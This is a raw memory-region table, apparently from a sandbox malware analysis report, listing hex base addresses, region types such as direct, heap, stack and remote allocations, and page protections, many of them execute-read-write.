B898000
|
direct allocation
|
page execute and read and write
|
||
B2E2000
|
direct allocation
|
page execute and read and write
|
||
B6B0000
|
direct allocation
|
page execute and read and write
|
||
BCDE000
|
direct allocation
|
page execute and read and write
|
||
AF23000
|
direct allocation
|
page execute and read and write
|
||
B1B5000
|
direct allocation
|
page execute and read and write
|
||
8467000
|
heap
|
page read and write
|
||
BEC0000
|
direct allocation
|
page execute and read and write
|
||
B24A000
|
direct allocation
|
page execute and read and write
|
||
B1CB000
|
direct allocation
|
page execute and read and write
|
||
B7DA000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
B0CA000
|
direct allocation
|
page execute and read and write
|
||
3186000
|
heap
|
page read and write
|
||
25040000
|
trusted library allocation
|
page read and write
|
||
B6D8000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
64C0000
|
direct allocation
|
page read and write
|
||
B492000
|
direct allocation
|
page execute and read and write
|
||
B892000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B4A3000
|
direct allocation
|
page execute and read and write
|
||
604C000
|
trusted library allocation
|
page read and write
|
||
B796000
|
direct allocation
|
page execute and read and write
|
||
86C0000
|
trusted library allocation
|
page read and write
|
||
23184000
|
trusted library allocation
|
page read and write
|
||
446000
|
unkown
|
page readonly
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AC25000
|
direct allocation
|
page execute and read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
B511000
|
direct allocation
|
page execute and read and write
|
||
313E000
|
stack
|
page read and write
|
||
BAAD000
|
direct allocation
|
page execute and read and write
|
||
B9AE000
|
direct allocation
|
page execute and read and write
|
||
BDAC000
|
direct allocation
|
page execute and read and write
|
||
B81A000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B7C3000
|
direct allocation
|
page execute and read and write
|
||
BC1C000
|
direct allocation
|
page execute and read and write
|
||
5641000
|
trusted library allocation
|
page read and write
|
||
BBFE000
|
direct allocation
|
page execute and read and write
|
||
AE29000
|
direct allocation
|
page execute and read and write
|
||
32C8000
|
heap
|
page read and write
|
||
B2D4000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
22F40000
|
trusted library allocation
|
page read and write
|
||
AD9F000
|
direct allocation
|
page execute and read and write
|
||
BDBF000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
708E000
|
heap
|
page read and write
|
||
B39A000
|
direct allocation
|
page execute and read and write
|
||
BC44000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B4C9000
|
direct allocation
|
page execute and read and write
|
||
A83D000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B9E1000
|
direct allocation
|
page execute and read and write
|
||
ACE7000
|
direct allocation
|
page execute and read and write
|
||
BCEF000
|
direct allocation
|
page execute and read and write
|
||
B207000
|
direct allocation
|
page execute and read and write
|
||
B2BD000
|
direct allocation
|
page execute and read and write
|
||
229C8000
|
trusted library allocation
|
page read and write
|
||
8901000
|
heap
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
BDBC000
|
direct allocation
|
page execute and read and write
|
||
B4A1000
|
direct allocation
|
page execute and read and write
|
||
226F0000
|
heap
|
page read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
22EB7000
|
trusted library allocation
|
page read and write
|
||
B0B1000
|
direct allocation
|
page execute and read and write
|
||
B135000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
B7A8000
|
direct allocation
|
page execute and read and write
|
||
BB86000
|
direct allocation
|
page execute and read and write
|
||
409000
|
unkown
|
page write copy
|
||
3180000
|
heap
|
page read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
440000
|
unkown
|
page read and write
|
||
B8AD000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
2466E000
|
stack
|
page read and write
|
||
21BB0000
|
remote allocation
|
page read and write
|
||
B04A000
|
direct allocation
|
page execute and read and write
|
||
51FB000
|
stack
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
AD3F000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
AD37000
|
direct allocation
|
page execute and read and write
|
||
5698000
|
trusted library allocation
|
page read and write
|
||
AEAC000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
8830000
|
trusted library allocation
|
page read and write
|
||
AF5C000
|
direct allocation
|
page execute and read and write
|
||
BBEC000
|
direct allocation
|
page execute and read and write
|
||
BF84000
|
direct allocation
|
page execute and read and write
|
||
B3D9000
|
direct allocation
|
page execute and read and write
|
||
BEC5000
|
direct allocation
|
page execute and read and write
|
||
BB0D000
|
direct allocation
|
page execute and read and write
|
||
BB3C000
|
direct allocation
|
page execute and read and write
|
||
B49F000
|
direct allocation
|
page execute and read and write
|
||
BF8B000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B987000
|
direct allocation
|
page execute and read and write
|
||
BDE3000
|
direct allocation
|
page execute and read and write
|
||
B583000
|
direct allocation
|
page execute and read and write
|
||
B3C7000
|
direct allocation
|
page execute and read and write
|
||
B38A000
|
direct allocation
|
page execute and read and write
|
||
BACC000
|
direct allocation
|
page execute and read and write
|
||
B5A2000
|
direct allocation
|
page execute and read and write
|
||
AE2C000
|
direct allocation
|
page execute and read and write
|
||
AF6B000
|
direct allocation
|
page execute and read and write
|
||
5360000
|
heap
|
page execute and read and write
|
||
BED3000
|
direct allocation
|
page execute and read and write
|
||
B670000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
B812000
|
direct allocation
|
page execute and read and write
|
||
BAB2000
|
direct allocation
|
page execute and read and write
|
||
B711000
|
direct allocation
|
page execute and read and write
|
||
BFAD000
|
direct allocation
|
page execute and read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
305C000
|
heap
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
23CB7000
|
trusted library allocation
|
page read and write
|
||
B5EF000
|
direct allocation
|
page execute and read and write
|
||
B8E0000
|
direct allocation
|
page execute and read and write
|
||
21F76000
|
trusted library allocation
|
page read and write
|
||
2505A000
|
trusted library allocation
|
page read and write
|
||
B386000
|
direct allocation
|
page execute and read and write
|
||
AFF6000
|
direct allocation
|
page execute and read and write
|
||
21EA0000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B03A000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BA40000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B34D000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B4DF000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
7B5E000
|
stack
|
page read and write
|
||
B229000
|
direct allocation
|
page execute and read and write
|
||
B9F5000
|
direct allocation
|
page execute and read and write
|
||
B9DB000
|
direct allocation
|
page execute and read and write
|
||
B1AE000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
ADB0000
|
direct allocation
|
page execute and read and write
|
||
23AE5000
|
trusted library allocation
|
page read and write
|
||
B5C9000
|
direct allocation
|
page execute and read and write
|
||
AF9B000
|
direct allocation
|
page execute and read and write
|
||
6643000
|
heap
|
page read and write
|
||
B12B000
|
direct allocation
|
page execute and read and write
|
||
B80C000
|
direct allocation
|
page execute and read and write
|
||
3227000
|
trusted library allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
22B76000
|
trusted library allocation
|
page read and write
|
||
229C0000
|
trusted library allocation
|
page read and write
|
||
23A60000
|
trusted library allocation
|
page read and write
|
||
B473000
|
direct allocation
|
page execute and read and write
|
||
BFCA000
|
direct allocation
|
page execute and read and write
|
||
B4CD000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
B071000
|
direct allocation
|
page execute and read and write
|
||
256E0000
|
trusted library allocation
|
page execute and read and write
|
||
BDEC000
|
direct allocation
|
page execute and read and write
|
||
B72D000
|
direct allocation
|
page execute and read and write
|
||
BC34000
|
direct allocation
|
page execute and read and write
|
||
24CA0000
|
trusted library allocation
|
page read and write
|
||
877E000
|
stack
|
page read and write
|
||
BCE0000
|
direct allocation
|
page execute and read and write
|
||
3299000
|
heap
|
page read and write
|
||
B679000
|
direct allocation
|
page execute and read and write
|
||
AFBB000
|
direct allocation
|
page execute and read and write
|
||
BF47000
|
direct allocation
|
page execute and read and write
|
||
6520000
|
direct allocation
|
page read and write
|
||
6F10000
|
direct allocation
|
page read and write
|
||
228E0000
|
trusted library allocation
|
page read and write
|
||
B075000
|
direct allocation
|
page execute and read and write
|
||
AEF000
|
stack
|
page read and write
|
||
A8DC000
|
direct allocation
|
page execute and read and write
|
||
BC80000
|
direct allocation
|
page execute and read and write
|
||
B9FD000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
B868000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
86B0000
|
trusted library allocation
|
page execute and read and write
|
||
2259E000
|
stack
|
page read and write
|
||
24D66000
|
trusted library allocation
|
page read and write
|
||
B1EE000
|
direct allocation
|
page execute and read and write
|
||
BD36000
|
direct allocation
|
page execute and read and write
|
||
B9FF000
|
direct allocation
|
page execute and read and write
|
||
BA17000
|
direct allocation
|
page execute and read and write
|
||
B4B9000
|
direct allocation
|
page execute and read and write
|
||
B252000
|
direct allocation
|
page execute and read and write
|
||
B088000
|
direct allocation
|
page execute and read and write
|
||
5130000
|
remote allocation
|
page execute and read and write
|
||
B718000
|
direct allocation
|
page execute and read and write
|
||
BA87000
|
direct allocation
|
page execute and read and write
|
||
B5C6000
|
direct allocation
|
page execute and read and write
|
||
B5CD000
|
direct allocation
|
page execute and read and write
|
||
A60C000
|
direct allocation
|
page execute and read and write
|
||
BC60000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B816000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
54C6000
|
trusted library allocation
|
page read and write
|
||
B88A000
|
direct allocation
|
page execute and read and write
|
||
B0E4000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
ADC8000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
A9B0000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B79E000
|
direct allocation
|
page execute and read and write
|
||
24B64000
|
heap
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BA27000
|
direct allocation
|
page execute and read and write
|
||
7850000
|
heap
|
page read and write
|
||
BDCF000
|
direct allocation
|
page execute and read and write
|
||
B0B0000
|
direct allocation
|
page execute and read and write
|
||
B300000
|
direct allocation
|
page execute and read and write
|
||
ABA4000
|
direct allocation
|
page execute and read and write
|
||
BB12000
|
direct allocation
|
page execute and read and write
|
||
B6C3000
|
direct allocation
|
page execute and read and write
|
||
A894000
|
direct allocation
|
page execute and read and write
|
||
BEDC000
|
direct allocation
|
page execute and read and write
|
||
B021000
|
direct allocation
|
page execute and read and write
|
||
B062000
|
direct allocation
|
page execute and read and write
|
||
B7AB000
|
direct allocation
|
page execute and read and write
|
||
21B0D000
|
stack
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
AE3C000
|
direct allocation
|
page execute and read and write
|
||
BF4D000
|
direct allocation
|
page execute and read and write
|
||
AE40000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
A767000
|
direct allocation
|
page execute and read and write
|
||
ADB8000
|
direct allocation
|
page execute and read and write
|
||
BA44000
|
direct allocation
|
page execute and read and write
|
||
21CD7000
|
stack
|
page read and write
|
||
B9DD000
|
direct allocation
|
page execute and read and write
|
||
25050000
|
trusted library allocation
|
page read and write
|
||
5320000
|
direct allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
BDB3000
|
direct allocation
|
page execute and read and write
|
||
228F0000
|
heap
|
page execute and read and write
|
||
B0C4000
|
direct allocation
|
page execute and read and write
|
||
BC88000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
AE34000
|
direct allocation
|
page execute and read and write
|
||
AF75000
|
direct allocation
|
page execute and read and write
|
||
B4E4000
|
direct allocation
|
page execute and read and write
|
||
42B000
|
unkown
|
page read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
24BDF000
|
heap
|
page read and write
|
||
AF92000
|
direct allocation
|
page execute and read and write
|
||
B870000
|
direct allocation
|
page execute and read and write
|
||
59A000
|
trusted library allocation
|
page execute and read and write
|
||
5624000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B9F3000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B129000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B388000
|
direct allocation
|
page execute and read and write
|
||
BFBD000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B8E5000
|
direct allocation
|
page execute and read and write
|
||
B903000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
64B0000
|
direct allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
A7AC000
|
direct allocation
|
page execute and read and write
|
||
BCEE000
|
direct allocation
|
page execute and read and write
|
||
AE4C000
|
direct allocation
|
page execute and read and write
|
||
B100000
|
direct allocation
|
page execute and read and write
|
||
B1F6000
|
direct allocation
|
page execute and read and write
|
||
BD32000
|
direct allocation
|
page execute and read and write
|
||
21C40000
|
direct allocation
|
page read and write
|
||
BB67000
|
direct allocation
|
page execute and read and write
|
||
BCF8000
|
direct allocation
|
page execute and read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
24CC0000
|
trusted library allocation
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
BF7E000
|
direct allocation
|
page execute and read and write
|
||
AF12000
|
direct allocation
|
page execute and read and write
|
||
AFAA000
|
direct allocation
|
page execute and read and write
|
||
B70D000
|
direct allocation
|
page execute and read and write
|
||
23ECE000
|
stack
|
page read and write
|
||
8300000
|
heap
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
ABB9000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
B0E1000
|
direct allocation
|
page execute and read and write
|
||
B2C8000
|
direct allocation
|
page execute and read and write
|
||
8A99000
|
heap
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AEBB000
|
direct allocation
|
page execute and read and write
|
||
22B62000
|
trusted library allocation
|
page read and write
|
||
B7B0000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
BCDA000
|
direct allocation
|
page execute and read and write
|
||
229B4000
|
trusted library allocation
|
page read and write
|
||
B29E000
|
direct allocation
|
page execute and read and write
|
||
B808000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B79C000
|
direct allocation
|
page execute and read and write
|
||
BBF8000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AFEB000
|
direct allocation
|
page execute and read and write
|
||
22C3D000
|
trusted library allocation
|
page read and write
|
||
AB21000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
B79E000
|
direct allocation
|
page execute and read and write
|
||
B3D4000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B79A000
|
direct allocation
|
page execute and read and write
|
||
BF11000
|
direct allocation
|
page execute and read and write
|
||
B9C7000
|
direct allocation
|
page execute and read and write
|
||
B8CF000
|
direct allocation
|
page execute and read and write
|
||
B3A2000
|
direct allocation
|
page execute and read and write
|
||
ADDB000
|
direct allocation
|
page execute and read and write
|
||
23F60000
|
trusted library allocation
|
page read and write
|
||
BFA4000
|
direct allocation
|
page execute and read and write
|
||
AE03000
|
direct allocation
|
page execute and read and write
|
||
74D5000
|
heap
|
page read and write
|
||
B96B000
|
direct allocation
|
page execute and read and write
|
||
32D1000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B4CC000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
5170000
|
heap
|
page read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
B4CE000
|
direct allocation
|
page execute and read and write
|
||
21F78000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
BD78000
|
direct allocation
|
page execute and read and write
|
||
B3C8000
|
direct allocation
|
page execute and read and write
|
||
230F8000
|
trusted library allocation
|
page read and write
|
||
BE7C000
|
direct allocation
|
page execute and read and write
|
||
22EDE000
|
trusted library allocation
|
page read and write
|
||
A587000
|
direct allocation
|
page execute and read and write
|
||
230FC000
|
trusted library allocation
|
page read and write
|
||
B060000
|
direct allocation
|
page execute and read and write
|
||
BF55000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
24D50000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
24990000
|
heap
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
65BD000
|
heap
|
page read and write
|
||
B4E6000
|
direct allocation
|
page execute and read and write
|
||
B297000
|
direct allocation
|
page execute and read and write
|
||
B784000
|
direct allocation
|
page execute and read and write
|
||
65EA000
|
heap
|
page read and write
|
||
BCCB000
|
direct allocation
|
page execute and read and write
|
||
24190000
|
trusted library allocation
|
page execute and read and write
|
||
B364000
|
direct allocation
|
page execute and read and write
|
||
625000
|
heap
|
page read and write
|
||
B4F4000
|
direct allocation
|
page execute and read and write
|
||
BEE0000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
21FB6000
|
trusted library allocation
|
page read and write
|
||
AD0B000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B624000
|
direct allocation
|
page execute and read and write
|
||
AC82000
|
direct allocation
|
page execute and read and write
|
||
B0D5000
|
direct allocation
|
page execute and read and write
|
||
2409E000
|
stack
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
AFFA000
|
direct allocation
|
page execute and read and write
|
||
23F50000
|
trusted library allocation
|
page read and write
|
||
23F20000
|
trusted library allocation
|
page read and write
|
||
B9E7000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BA6D000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
ACAC000
|
direct allocation
|
page execute and read and write
|
||
21FF1000
|
trusted library allocation
|
page read and write
|
||
B442000
|
direct allocation
|
page execute and read and write
|
||
B223000
|
direct allocation
|
page execute and read and write
|
||
BD34000
|
direct allocation
|
page execute and read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
AF79000
|
direct allocation
|
page execute and read and write
|
||
22BFA000
|
trusted library allocation
|
page read and write
|
||
B7A2000
|
direct allocation
|
page execute and read and write
|
||
228D0000
|
heap
|
page execute and read and write
|
||
BA84000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BC00000
|
direct allocation
|
page execute and read and write
|
||
B453000
|
direct allocation
|
page execute and read and write
|
||
24D44000
|
trusted library allocation
|
page read and write
|
||
B409000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
ACCC000
|
direct allocation
|
page execute and read and write
|
||
B814000
|
direct allocation
|
page execute and read and write
|
||
BCA3000
|
direct allocation
|
page execute and read and write
|
||
22690000
|
direct allocation
|
page read and write
|
||
B0B2000
|
direct allocation
|
page execute and read and write
|
||
B22E000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
70FD000
|
heap
|
page read and write
|
||
BAA5000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
BA75000
|
direct allocation
|
page execute and read and write
|
||
B032000
|
direct allocation
|
page execute and read and write
|
||
B938000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
226A0000
|
direct allocation
|
page read and write
|
||
24D40000
|
trusted library allocation
|
page read and write
|
||
BD86000
|
direct allocation
|
page execute and read and write
|
||
BF9A000
|
direct allocation
|
page execute and read and write
|
||
23197000
|
trusted library allocation
|
page read and write
|
||
B661000
|
direct allocation
|
page execute and read and write
|
||
B083000
|
direct allocation
|
page execute and read and write
|
||
B3B6000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
2F50000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AAA1000
|
direct allocation
|
page execute and read and write
|
||
B1F7000
|
direct allocation
|
page execute and read and write
|
||
256A0000
|
trusted library allocation
|
page execute and read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
AFB3000
|
direct allocation
|
page execute and read and write
|
||
B4F9000
|
direct allocation
|
page execute and read and write
|
||
22A93000
|
trusted library allocation
|
page read and write
|
||
7850000
|
trusted library allocation
|
page execute and read and write
|
||
A7D9000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B7BA000
|
direct allocation
|
page execute and read and write
|
||
B427000
|
direct allocation
|
page execute and read and write
|
||
B103000
|
direct allocation
|
page execute and read and write
|
||
B308000
|
direct allocation
|
page execute and read and write
|
||
7487000
|
heap
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B10D000
|
direct allocation
|
page execute and read and write
|
||
B82A000
|
direct allocation
|
page execute and read and write
|
||
B1C7000
|
direct allocation
|
page execute and read and write
|
||
407000
|
unkown
|
page readonly
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
B6A8000
|
direct allocation
|
page execute and read and write
|
||
22CC1000
|
trusted library allocation
|
page read and write
|
||
6FB0000
|
direct allocation
|
page read and write
|
||
796B000
|
stack
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
23C8F000
|
trusted library allocation
|
page read and write
|
||
5A2000
|
trusted library allocation
|
page read and write
|
||
BB5B000
|
direct allocation
|
page execute and read and write
|
||
241B0000
|
heap
|
page read and write
|
||
88F0000
|
heap
|
page read and write
|
||
B4B6000
|
direct allocation
|
page execute and read and write
|
||
30FE000
|
stack
|
page read and write
|
||
BAA3000
|
direct allocation
|
page execute and read and write
|
||
651D000
|
trusted library allocation
|
page read and write
|
||
B5DF000
|
direct allocation
|
page execute and read and write
|
||
BDDA000
|
direct allocation
|
page execute and read and write
|
||
24FBF000
|
stack
|
page read and write
|
||
B271000
|
direct allocation
|
page execute and read and write
|
||
AE01000
|
direct allocation
|
page execute and read and write
|
||
AF64000
|
direct allocation
|
page execute and read and write
|
||
BAFC000
|
direct allocation
|
page execute and read and write
|
||
861C000
|
heap
|
page read and write
|
||
220CC000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
B63C000
|
direct allocation
|
page execute and read and write
|
||
A7BD000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
BAD4000
|
direct allocation
|
page execute and read and write
|
||
22DFF000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B3C3000
|
direct allocation
|
page execute and read and write
|
||
23BBF000
|
trusted library allocation
|
page read and write
|
||
BCE4000
|
direct allocation
|
page execute and read and write
|
||
84B2000
|
heap
|
page read and write
|
||
AF58000
|
direct allocation
|
page execute and read and write
|
||
BB1F000
|
direct allocation
|
page execute and read and write
|
||
B392000
|
direct allocation
|
page execute and read and write
|
||
257A0000
|
trusted library allocation
|
page read and write
|
||
8C40000
|
trusted library allocation
|
page execute and read and write
|
||
94D0000
|
heap
|
page read and write
|
||
B8C9000
|
direct allocation
|
page execute and read and write
|
||
BA57000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
2EB6000
|
heap
|
page read and write
|
||
76C0000
|
trusted library allocation
|
page read and write
|
||
B006000
|
direct allocation
|
page execute and read and write
|
||
B927000
|
direct allocation
|
page execute and read and write
|
||
AF56000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
52E0000
|
direct allocation
|
page read and write
|
||
BBD4000
|
direct allocation
|
page execute and read and write
|
||
BCEC000
|
direct allocation
|
page execute and read and write
|
||
AFCC000
|
direct allocation
|
page execute and read and write
|
||
24B60000
|
trusted library allocation
|
page read and write
|
||
5EA1000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
7881000
|
heap
|
page read and write
|
||
BBDB000
|
direct allocation
|
page execute and read and write
|
||
74BE000
|
heap
|
page read and write
|
||
B8ED000
|
direct allocation
|
page execute and read and write
|
||
B329000
|
direct allocation
|
page execute and read and write
|
||
20EE000
|
stack
|
page read and write
|
||
BD0B000
|
direct allocation
|
page execute and read and write
|
||
B5DA000
|
direct allocation
|
page execute and read and write
|
||
B7EF000
|
direct allocation
|
page execute and read and write
|
||
BD0F000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
BB27000
|
direct allocation
|
page execute and read and write
|
||
84E8000
|
heap
|
page read and write
|
||
BCAB000
|
direct allocation
|
page execute and read and write
|
||
78CF000
|
heap
|
page read and write
|
||
6EE0000
|
direct allocation
|
page read and write
|
||
312E000
|
stack
|
page read and write
|
||
B1E5000
|
direct allocation
|
page execute and read and write
|
||
BA67000
|
direct allocation
|
page execute and read and write
|
||
B14E000
|
direct allocation
|
page execute and read and write
|
||
B1BB000
|
direct allocation
|
page execute and read and write
|
||
BA63000
|
direct allocation
|
page execute and read and write
|
||
B91F000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
5B30000
|
trusted library allocation
|
page read and write
|
||
B1C9000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
B800000
|
direct allocation
|
page execute and read and write
|
||
BD81000
|
direct allocation
|
page execute and read and write
|
||
B38E000
|
direct allocation
|
page execute and read and write
|
||
ABC8000
|
direct allocation
|
page execute and read and write
|
||
B14A000
|
direct allocation
|
page execute and read and write
|
||
B9D9000
|
direct allocation
|
page execute and read and write
|
||
A8BF000
|
direct allocation
|
page execute and read and write
|
||
B08B000
|
direct allocation
|
page execute and read and write
|
||
78A0000
|
trusted library allocation
|
page read and write
|
||
BA6B000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
240A0000
|
trusted library allocation
|
page read and write
|
||
B02D000
|
direct allocation
|
page execute and read and write
|
||
B58B000
|
direct allocation
|
page execute and read and write
|
||
BDA9000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BA2C000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B3A8000
|
direct allocation
|
page execute and read and write
|
||
22ACA000
|
trusted library allocation
|
page read and write
|
||
23B8F000
|
trusted library allocation
|
page read and write
|
||
BA4D000
|
direct allocation
|
page execute and read and write
|
||
ABE4000
|
direct allocation
|
page execute and read and write
|
||
B259000
|
direct allocation
|
page execute and read and write
|
||
B195000
|
direct allocation
|
page execute and read and write
|
||
BD55000
|
direct allocation
|
page execute and read and write
|
||
B45F000
|
direct allocation
|
page execute and read and write
|
||
24C90000
|
trusted library allocation
|
page read and write
|
||
BE86000
|
direct allocation
|
page execute and read and write
|
||
B50C000
|
direct allocation
|
page execute and read and write
|
||
BBAD000
|
direct allocation
|
page execute and read and write
|
||
BD2A000
|
direct allocation
|
page execute and read and write
|
||
